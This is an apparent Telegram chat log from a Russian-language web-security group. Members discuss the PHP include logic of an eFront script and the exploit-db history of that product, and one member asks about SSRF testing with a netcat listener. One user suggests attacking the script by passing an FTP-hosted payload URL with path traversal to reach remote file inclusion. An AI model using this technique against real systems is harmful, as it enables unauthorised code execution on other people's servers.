Size: a a a

2020 May 23

N

Name in WebPwnChat
Ты про префиксы перехода по дериктория ?
источник

P

Pulsar in WebPwnChat
helix
а, судя по нику - только аллах
Аллах имя нарицательное, пишется с большой бкувы
источник

h

helix in WebPwnChat
я с большой буквы не пишу в принципе
источник

P

Pulsar in WebPwnChat
а ну да. по нику же видно
источник

m

medalahonor in WebPwnChat
Name
Можешь поподробнее рассказать, что за префиксы ?
Начало пути. Почему ты думаешь, что там есть именно инклюд? Ошибка специфичная выскакивает?
источник

N

Name in WebPwnChat
medalahonor
Начало пути. Почему ты думаешь, что там есть именно инклюд? Ошибка специфичная выскакивает?
Нашел исходник
источник

N

Name in WebPwnChat
medalahonor
Начало пути. Почему ты думаешь, что там есть именно инклюд? Ошибка специфичная выскакивает?
foreach (explode(",", $_GET['load']) as $value) {
if (is_file("$value.js")) {
 $real_path = mb_strtolower(realpath("$value.js"));
 if (strpos($real_path, mb_strtolower(dirname(__FILE__))) !== false || strpos($real_path, mb_strtolower(dirname(dirname(__FILE__)).DIRECTORY_SEPARATOR.'modules'.DIRECTORY_SEPARATOR)) !== false) {
  lastModificationTime(filemtime("$value.js"));
  include("$value.js");echo "\n";
 }
}
}
источник

m

medalahonor in WebPwnChat
Name
foreach (explode(",", $_GET['load']) as $value) {
if (is_file("$value.js")) {
 $real_path = mb_strtolower(realpath("$value.js"));
 if (strpos($real_path, mb_strtolower(dirname(__FILE__))) !== false || strpos($real_path, mb_strtolower(dirname(dirname(__FILE__)).DIRECTORY_SEPARATOR.'modules'.DIRECTORY_SEPARATOR)) !== false) {
  lastModificationTime(filemtime("$value.js"));
  include("$value.js");echo "\n";
 }
}
}
Так это от efront скрипт. Посмотри на exploit-db, может ещё что-то найдётся. По поводу этого скрипта, то можно поднять свой ftp и попробовать что-то вроде ftp://ip:port/payload.txt#../../../[...]/js/scripts
источник

N

Name in WebPwnChat
medalahonor
Так это от efront скрипт. Посмотри на exploit-db, может ещё что-то найдётся. По поводу этого скрипта, то можно поднять свой ftp и попробовать что-то вроде ftp://ip:port/payload.txt#../../../[...]/js/scripts
Да, ефронт. Все баги с exploit-db пофикшены.
источник

m

medalahonor in WebPwnChat
Name
Да, ефронт. Все баги с exploit-db пофикшены.
С этого и надо было начинать
источник

N

Name in WebPwnChat
medalahonor
С этого и надо было начинать
Проблема в том, что хоть это и efront, я не знаю, какой он версии.
источник

N

Name in WebPwnChat
Многие файлы новых версий отсутствуют, но при этом баги старых версий тоже отсутствуют
источник

P

Pulsar in WebPwnChat
при тестировании на ssrf можно ли netcat использовать указав свой глобальный ip?
источник

P

Pulsar in WebPwnChat
вместо коллаборатора
источник

P

PP in WebPwnChat
+
источник

P

Pulsar in WebPwnChat
типа открываешь листенер на конкретный порт и отсылать с уязвимого бэкенда пакеты сразу себе
источник

P

Pulsar in WebPwnChat
круто. норм. спасибо.
источник

VS

Valeriy Shevchenko in WebPwnChat
Vladimir 0D0A Polyakov\x00
https://twitter.com/nnwakelam/status/1071856266773958656

все так. Но рано или поздно все равно эти компоненты обычно складываются, и начинаешь и код писать и цтфить и баунтить.
А потом он в инстике постит как заеб@лся читать документацию к чему-то там на 600 страниц
источник

VP

Vladimir 0D0A Polyak... in WebPwnChat
Valeriy Shevchenko
А потом он в инстике постит как заеб@лся читать документацию к чему-то там на 600 страниц
ну вроде это никак не противоречит тому что код он не пишет
источник

VS

Valeriy Shevchenko in WebPwnChat
Да. Но и не на столького «легко» у него всё как может казаться со стороны
источник